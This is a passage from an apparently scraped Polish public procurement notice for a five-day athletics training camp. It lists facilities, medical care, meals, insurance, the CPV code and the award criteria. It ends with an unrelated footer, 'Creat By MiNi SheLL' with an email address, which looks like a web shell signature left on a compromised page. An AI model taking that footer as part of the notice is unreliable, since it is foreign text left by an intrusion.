3.5  Teren leśny w pobliżu zakwaterowania.
3.6  Codziennie 2 godziny ( między 10.00 a 18.00) korzystanie z pełnowymiarowego (400 m) stadionu lekkoatletycznego oraz sprzęt sportowy typu: bloki, piłki, kule, oszczepy, piłki lekarskie itp.
3.7  Dla wybranych zawodników  (15 osób) codziennie 3 zabiegi odnowy biologicznej, solanki, hydromasaże, masaże itp.)
3.8. Każdego dnia do dyspozycji sala gimnastyczna (min. wymiary 25mx15m) dostępna przez dwie godziny dziennie ( między 1000 a 1300 i lub 1500 a 1800).
4. OPIEKA MEDYCZNA
4.1. Lekarz dochodzący (na wezwanie).
4.2. Izolatka dla chorych.
4.3. Zapewnienie leków pierwszej pomocy.
5. WYŻYWIENIE
5.1. Trzy posiłki dziennie z podwieczorkiem /śniadanie, obiad,  kolacja/.
5.2. Codziennie 0,5 l wody mineralnej niegazowanej (? ilość butelek wody nisko zmineralizowanej i ? ilość butelek wody wysoko zmineralizowanej) dla każdego uczestnika obozu.
5.3. Suchy prowiant na podróż, sok.
6. W RAMACH REALIZACJI PRZEDMIOTU ZAMÓWIENIA WYKONAWCA ZOBOWIĄZUJE SIĘ DO:
6.1. Zapewnienia bezpłatnego pobytu i przejazdu dla opiekunów. 
6.2. Ubezpieczenie uczestników w czasie podróży i pobytu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Atrakcyjność obiektu - 5</li>
<li>3. Wysokość  dziennej stawki żywieniowej - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com